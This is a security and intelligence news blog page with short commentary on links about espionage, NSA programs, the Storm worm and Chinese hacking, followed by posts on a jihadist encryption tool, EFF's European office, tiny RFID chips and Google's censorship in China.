Former DuPont senior scientist pleads to corporate espionage -- fresh case of corporate espionage. As always I find it a totally biased opinion with companies falling in love with their trade secrets, even coming up with numbers as high as $400M

Information warfare, psyops, and the power of myth -- decent article on the topics in today's world of war on ideologies

Glitches plague NSA's effort to track terrorists online -- Tracking terrorists online courtesy of the NSA's Turbulence program is a another $500M failure to understand the dynamics of cyberterrorism. Thankfully, there're third-party organization the NSA is definitely listening to and obtaining its intelligence giving the lack of ethnical diversity in the U.S intelligence community, one that is crucial nowadays. The cuttest quote of the day "Inside the agency, Turbulence's sensitive activities are sequestered behind passwords known to few."

Panda Software Releases Malware Radar, the First Automated Malware Audit Service -- not necessarily the first as pretty much all vendors offer online malware scan, but it's a product line extension based on recent licensing deals of Panda with other vendors

Another Malware protection engine becomes Malware enabler engine -- when the security solution ends up the security problem itself

Hackers target the home front -- great example of targeted email attacks, makes you wonder two things - what's the chance the attacks aren't really systematic but basically rather regular malware infection attempts, or the emails of top management or anyone @bank.com have been available to attackers wanting to take advantage of the insecurities of their home PCs

Turkish hacker strikes Down Under -- Why shared hosting is unserious from a security point of view

'Storm' Worm Touches Down on IM -- Storm Worm piece of malware switching vectors, interesting, but a fact demonstrating the novice experience of the malware author, as if it were an experienced one, the feature would have been build in the very first releases compared to mass mailings only

Top 10 Disrupters of 2006 -- catchy slide show and here's the full story

Microsoft's Patches -- Zero day Wednesday took place as well

Russia's Ivanov slams U.S. missile shield plans in Europe -- the proposed U.S missile shield in Eastern Europe would give Russia the excuse to do something naughty like this

Cyber officials: Chinese hackers attack 'anything and everything' -- Chinese script kiddies generating noise so that the advanced and government backed espionage attempts remain to be sorted through the noise - predictable pattern

Cuban Information Minister Blasts US Digital Espionage -- Cuba to the U.S - Stop using OSINT and data aggregation techniques against us, as you see, we don't know how to Google

The Next Big Ad Medium: Podcasts -- unless measurability improves it's all shooting into the dark for advertisers, and ad budget allocation dream come true for publishers

How to Stalk Your Family -- start by self-regulation, everyone?

Text of Email to all Yahoos -- Yahoo's CFO to all Yahoos, now if an average Yahoo is able to understand the corporate talk I'll bring the beer

China's Submarine Fleet Continues Low Patrol Rate -- outstanding analysis

Google Agrees to Buy Adscape -- Google's getting into the emerging in-game advertising market. Would a gaming company find that the lack of ads in its game can turn into a competitive advantage in the long-term?

Yahoo co-founder Jerry Yang to donate $75 million to Stanford -- never forget who you are and where you came from. Jerry Yang is donating $75M to Stanford University which as a matter of fact is largely financed by ex-disruptors, and yes tuition fees. They even hold quite some Google shares

CIA's secret prisons -- full coverage

Continue reading →

Terrorism and Encryption

Jihadist themed encryption tool -- using "infidel" algorithms :

"The program`s `portability` as an application (not requiring installation on a personal computer) will become an increasingly desirable feature, especially considering the high use of Internet cafe worldwide by pro-terrorist Islamic extremists,' said iDefense Middle East analyst Andretta Summerville. 'Mujahedin Secrets,' which can be downloaded for free, offers 'the five best encryption algorithms, with symmetrical encryption keys (256 bit), asymmetrical encryption keys (2048 bit) and data compression,' according to a translation of a Global Islamic Media Front`s announcement about the software on Jan. 1, provided by Middle East Media Research Institute."

I've previously covered in-depth the topic of steganography and terrorism, and provided an example while assessing the threat -- and hype -- level of the Technical Mujahid. Terrorists have this problem with the infidels, pretty much everything they use starting from the Internet and their cellphone, even software running on a computer is "Made in InfidelLand". So I presume someone's not really comfortable with even encrypting their data with a U.S made PGP software, so re-branding and adding a Jihadist theme seems to be the solution at least when PSYOPS count. More info on the topic.

Continue reading →

The Electronic Frontier Foundation in Europe

Couldn't get any better :

"The Electronic Frontier Foundation (EFF) opened a new office in Brussels today to work with various institutions of the European Union (EU) on innovation and digital rights, acting as a watchdog for the public interest in intellectual property and civil liberties policy initiatives that impact the European digital environment. The new EFF Europe office, made possible by the generous support of the Open Society Institute and Mr. Mark Shuttleworth of the Shuttleworth Foundation, will allow EFF to have an increased focus on the development of EU law. EFF also plans to expand its efforts in European digital activism and looks forward to working with many groups and organizations to fight effectively for consumers' and technologists' interests."

Finally EDRI got some serious back-up on the frontlines.

Continue reading →

RFID Tracking Miniaturization

First it was RFID tracking ink, now with the introduction of the new generation Hitachi mu-chips, miniaturization proves for yet another time it has huge privacy implications :

"On February 13, Hitachi unveiled a tiny, new “powder” type RFID chip measuring 0.05 x 0.05 mm — the smallest yet — which they aim to begin marketing in 2 to 3 years. By relying on semiconductor miniaturization technology and using electron beams to write data on the chip substrates, Hitachi was able to create RFID chips 64 times smaller than their currently available 0.4 x 0.4 mm mu-chips. Like mu-chips, which have been used as an anti-counterfeit measure in admission tickets, the new chips have a 128-bit ROM for storing a unique 38-digit ID number."

I will spare you the acronym as I'm sure you know which intelligence agency is sitting on the world's largest budget, but just a wake up call that all technologies that are just getting commercialized or a first mention in the mainstream media have already been developed, even abondoned for more advanced alternatives by this agency years ago -- despite the fact that Hitachi is a Japanese company it's an U.S agency I'm talking about. OSI are definitely remembering the old school days now. Picture courtesy of Hitachi comparing the chip's size next to a grain of rice.

UPDATE: Slashdot picked up the story.

Continue reading →

Censorship in China - An Open Letter

An open letter to Google's Founders regarding the censorship of search results in China :

"During the National Day holiday week in 2002, when Google.com was blocked in China for the first time, Chinese Google users made an online protest spontaneously. They appealed to free the purer search engine wave by wave. Its seemed its also the first time grassroots power was demonstrated in China on Internet. You can imagine how eager they are to have a complete Internet instead of a shrunken one. At last, people won, Google backed. However, after 4 years, we started to question whether we should continue to support Google. Many users here were disappointed when they found Google.cn filtered many keywords. The compromise remarks by you in Davos made us more frustrated. Seems you are adopting self-censorship which hurts those loyal users a lot which also devalue your motto of "non-evil"."

Issues to keep in mind:
- Yahoo and Microsoft are doing it too in order to continue their business operations in China
- Google is alerting the searcher that the results are filtered because the ghost of Mao is alive and kicking and said so
- Google's losing market share in China's search market next to Sina.com due to censorship concerns, while local users are forgetting that Sina.com too is censoring the results, even worse, not even crawling as deep as Google is in respect to the quality of search results
- U.S Congressman Chris Smith has the issue on his agenda
- Technology companies are seeking government assistance on how to stop the ongoing censorship themselves
- The complete list of censored search results is worth going through
- Google's and Yahoo's shareholders are fighting back
- The Great Firewall is cracking from within with banned journalists now running the largest blogging network in China Continue reading →